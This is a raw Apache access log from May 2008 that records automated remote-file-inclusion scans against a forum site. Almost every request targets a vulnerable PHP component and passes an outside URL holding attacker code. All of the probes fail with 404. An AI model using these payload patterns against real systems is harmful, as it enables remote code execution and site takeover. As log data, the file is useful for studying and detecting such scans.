208.99.194.216 - - [11/May/2008:17:00:00 -0700] "GET /logs/access_071224.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://8-p.ru/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
89.159.200.63 - - [11/May/2008:17:01:26 -0700] "GET /logs/access.log HTTP/1.0" 200 11761613 "-" "Lynx/2.8.6rel.5 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8e" "www.collegiateforum.org"
62.116.117.149 - - [11/May/2008:17:02:21 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
62.116.117.149 - - [11/May/2008:17:02:21 -0700] "GET /errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
85.214.97.225 - - [11/May/2008:17:02:38 -0700] "GET /logs//pafiledb/includes/pafiledb_constants.php?module_root_path=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
85.214.97.225 - - [11/May/2008:17:02:38 -0700] "GET /logs/errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
85.214.97.225 - - [11/May/2008:17:02:38 -0700] "GET //pafiledb/includes/pafiledb_constants.php?module_root_path=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
85.214.97.225 - - [11/May/2008:17:02:38 -0700] "GET /errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
66.225.229.167 - - [11/May/2008:17:03:39 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://8-p.ru/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
66.225.229.167 - - [11/May/2008:17:03:39 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://8-p.ru/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
66.225.229.167 - - [11/May/2008:17:03:39 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://8-p.ru/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
66.225.229.167 - - [11/May/2008:17:03:40 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://8-p.ru/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
66.225.229.167 - - [11/May/2008:17:03:40 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://8-p.ru/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
66.225.229.167 - - [11/May/2008:17:03:40 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://8-p.ru/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
87.106.51.184 - - [11/May/2008:17:03:57 -0700] "GET /logs/access_080324.log//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://nairalanders.110mb.com/fuckrox-id%5B1%5D.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
87.106.51.184 - - [11/May/2008:17:03:57 -0700] "GET //%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://nairalanders.110mb.com/fuckrox-id%5B1%5D.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
87.106.51.184 - - [11/May/2008:17:03:57 -0700] "GET /logs//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://nairalanders.110mb.com/fuckrox-id%5B1%5D.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
209.62.115.202 - - [11/May/2008:17:04:08 -0700] "GET /logs/access_080107.log///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.boxlotto.com/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
64.207.204.13 - - [11/May/2008:17:04:17 -0700] "GET /logs/access_080324.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.207.204.13 - - [11/May/2008:17:04:17 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.207.204.13 - - [11/May/2008:17:04:17 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.22.89.194 - - [11/May/2008:17:05:23 -0700] "GET /logs/access_071231.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
64.22.89.194 - - [11/May/2008:17:05:23 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
64.22.89.194 - - [11/May/2008:17:05:23 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
62.116.117.149 - - [11/May/2008:17:05:31 -0700] "GET /logs/access_080331.log//content/multithumb/multithumb?mosConfig_absolute_path=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
62.116.117.149 - - [11/May/2008:17:05:31 -0700] "GET /logs/access_080331.log/errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
87.106.51.184 - - [11/May/2008:17:05:36 -0700] "GET /logs/access_080204.log//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://nairalanders.110mb.com/fuckrox-id%5B1%5D.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
66.7.193.54 - - [11/May/2008:17:05:45 -0700] "GET //index2.php?option=com_joomlaboard&task=§ionid=&id=&mosConfig_absolute_path=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
70.86.229.242 - - [11/May/2008:17:05:46 -0700] "GET //index2.php?option=com_joomlaboard&task=§ionid=&id=&mosConfig_absolute_path=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:05:55 -0700] "GET /logs/access_071224.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:05:56 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:05:56 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:06:05 -0700] "GET /logs/access_071224.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:06:05 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:06:06 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:06:15 -0700] "GET /logs/access_071224.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:06:15 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:06:16 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
64.207.204.13 - - [11/May/2008:17:06:24 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
67.19.51.194 - - [11/May/2008:17:06:48 -0700] "GET /logs//auction/includes/settings.inc.php?include_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
67.19.51.194 - - [11/May/2008:17:06:48 -0700] "GET //auction/includes/settings.inc.php?include_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
67.19.51.194 - - [11/May/2008:17:06:49 -0700] "GET /logs//auction/includes/settings.inc.php?include_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
67.19.51.194 - - [11/May/2008:17:06:49 -0700] "GET //auction/includes/settings.inc.php?include_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
92.48.74.30 - - [11/May/2008:17:06:51 -0700] "GET /logs/access.log/browse.php/header.php?prefix=http://www.ownar.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
92.48.74.30 - - [11/May/2008:17:06:52 -0700] "GET /browse.php/header.php?prefix=http://www.ownar.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
92.48.74.30 - - [11/May/2008:17:06:52 -0700] "GET /logs/browse.php/header.php?prefix=http://www.ownar.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
67.19.51.194 - - [11/May/2008:17:07:44 -0700] "GET /logs/access_071217.log//auction/includes/settings.inc.php?include_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
67.19.51.194 - - [11/May/2008:17:07:44 -0700] "GET //auction/includes/settings.inc.php?include_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
67.19.51.194 - - [11/May/2008:17:07:44 -0700] "GET /logs/access_071217.log//auction/includes/settings.inc.php?include_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
67.19.51.194 - - [11/May/2008:17:07:44 -0700] "GET /logs//auction/includes/settings.inc.php?include_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
67.19.51.194 - - [11/May/2008:17:07:44 -0700] "GET //auction/includes/settings.inc.php?include_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
67.19.51.194 - - [11/May/2008:17:07:44 -0700] "GET /logs//auction/includes/settings.inc.php?include_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
212.97.132.117 - - [11/May/2008:17:08:03 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.collegiateforum.org"
212.97.132.117 - - [11/May/2008:17:08:04 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.collegiateforum.org"
64.22.89.194 - - [11/May/2008:17:08:04 -0700] "GET /logs/access_080324.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
212.97.132.117 - - [11/May/2008:17:08:04 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.collegiateforum.org"
62.116.117.149 - - [11/May/2008:17:08:09 -0700] "GET /logs/access_080121.log//content/multithumb/multithumb?mosConfig_absolute_path=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
62.116.117.149 - - [11/May/2008:17:08:09 -0700] "GET /logs/access_080121.log/errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
212.97.132.117 - - [11/May/2008:17:08:13 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://8-p.ru/components/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.collegiateforum.org"
212.97.132.117 - - [11/May/2008:17:08:14 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://8-p.ru/components/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.collegiateforum.org"
212.97.132.117 - - [11/May/2008:17:08:14 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://8-p.ru/components/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.collegiateforum.org"
67.19.51.194 - - [11/May/2008:17:08:44 -0700] "GET /logs/access_071224.log//auction/includes/settings.inc.php?include_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
67.19.51.194 - - [11/May/2008:17:08:44 -0700] "GET /logs/access_071224.log//auction/includes/settings.inc.php?include_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
85.234.131.54 - - [11/May/2008:17:10:10 -0700] "GET //index2.php?option=com_joomlaboard&task=§ionid=&id=&mosConfig_absolute_path=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
208.99.194.216 - - [11/May/2008:17:10:13 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://8-p.ru/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
208.99.194.216 - - [11/May/2008:17:10:13 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://8-p.ru/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
208.99.194.216 - - [11/May/2008:17:10:13 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://8-p.ru/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
208.99.194.216 - - [11/May/2008:17:10:31 -0700] "GET /logs/access_080107.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://8-p.ru/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
62.116.117.149 - - [11/May/2008:17:11:12 -0700] "GET /logs/access_080225.log//content/multithumb/multithumb?mosConfig_absolute_path=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
62.116.117.149 - - [11/May/2008:17:11:13 -0700] "GET /logs/access_080225.log/errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
67.15.8.80 - - [11/May/2008:17:12:05 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xxxxfatalxxxx/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
67.15.8.80 - - [11/May/2008:17:12:05 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xxxxfatalxxxx/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
62.116.117.149 - - [11/May/2008:17:12:07 -0700] "GET /logs/access_080303.log//content/multithumb/multithumb?mosConfig_absolute_path=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
62.116.117.149 - - [11/May/2008:17:12:07 -0700] "GET /logs/access_080303.log/errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
208.99.194.216 - - [11/May/2008:17:12:17 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://8-p.ru/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
208.99.194.216 - - [11/May/2008:17:12:17 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://8-p.ru/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
208.99.194.216 - - [11/May/2008:17:12:18 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://8-p.ru/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.207.204.13 - - [11/May/2008:17:12:31 -0700] "GET /logs/access_080324.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.207.204.13 - - [11/May/2008:17:12:31 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.207.204.13 - - [11/May/2008:17:12:31 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.116.117.149 - - [11/May/2008:17:13:00 -0700] "GET /logs/access_080211.log//content/multithumb/multithumb?mosConfig_absolute_path=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
62.116.117.149 - - [11/May/2008:17:13:00 -0700] "GET /logs/access_080211.log/errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:13:06 -0700] "GET /logs/access_080324.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:13:24 -0700] "GET /logs/access_080324.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
212.97.132.117 - - [11/May/2008:17:13:34 -0700] "GET /logs/access_071224.log/inc/cmses/aedatingCMS.php?dir[inc]=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:13:35 -0700] "GET /logs/access_080324.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
62.116.117.149 - - [11/May/2008:17:13:36 -0700] "GET /logs/access_080310.log//content/multithumb/multithumb?mosConfig_absolute_path=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
62.116.117.149 - - [11/May/2008:17:13:37 -0700] "GET /logs/access_080310.log/errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
212.97.132.117 - - [11/May/2008:17:13:39 -0700] "GET /logs/access_071224.log/inc/cmses/aedatingCMS.php?dir[inc]=http://8-p.ru/components/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.collegiateforum.org"
216.7.32.9 - - [11/May/2008:17:13:44 -0700] "GET //index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.zimbaligolfestate.co.za/administrator/templates/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.collegiateforum.org"
216.7.32.9 - - [11/May/2008:17:13:45 -0700] "GET /logs//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.zimbaligolfestate.co.za/administrator/templates/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.collegiateforum.org"
85.214.97.225 - - [11/May/2008:17:13:51 -0700] "GET //pafiledb/includes/pafiledb_constants.php?module_root_path=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
85.214.97.225 - - [11/May/2008:17:13:52 -0700] "GET /errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
64.22.89.194 - - [11/May/2008:17:13:54 -0700] "GET /logs/access_071217.log//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
64.207.204.13 - - [11/May/2008:17:14:11 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
92.48.74.30 - - [11/May/2008:17:14:46 -0700] "GET /logs/access.log/browse.php/header.php?prefix=http://www.ownar.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
92.48.74.30 - - [11/May/2008:17:14:46 -0700] "GET /browse.php/header.php?prefix=http://www.ownar.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
92.48.74.30 - - [11/May/2008:17:14:46 -0700] "GET /logs/browse.php/header.php?prefix=http://www.ownar.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
211.233.6.126 - - [11/May/2008:17:15:26 -0700] "GET /logs/access_080107.log/errors.php?error=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
208.99.194.216 - - [11/May/2008:17:16:13 -0700] "GET /logs/access_080331.log//admin/business_inc/saveserver.php?thisdir=http://8-p.ru/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
67.205.67.241 - - [11/May/2008:17:16:24 -0700] "GET /modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://194.177.97.246/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
67.205.67.241 - - [11/May/2008:17:16:24 -0700] "GET /modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://194.177.97.246/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
85.214.97.225 - - [11/May/2008:17:16:43 -0700] "GET /logs//pafiledb/includes/pafiledb_constants.php?module_root_path=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
85.214.97.225 - - [11/May/2008:17:16:44 -0700] "GET /logs/errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
85.214.97.225 - - [11/May/2008:17:16:44 -0700] "GET //pafiledb/includes/pafiledb_constants.php?module_root_path=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
85.214.97.225 - - [11/May/2008:17:16:44 -0700] "GET /errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
92.48.74.30 - - [11/May/2008:17:19:12 -0700] "GET /logs/access_080107.log/browse.php/header.php?prefix=http://www.ownar.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
85.214.97.225 - - [11/May/2008:17:21:27 -0700] "GET /logs/access_071203.log//pafiledb/includes/pafiledb_constants.php?module_root_path=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
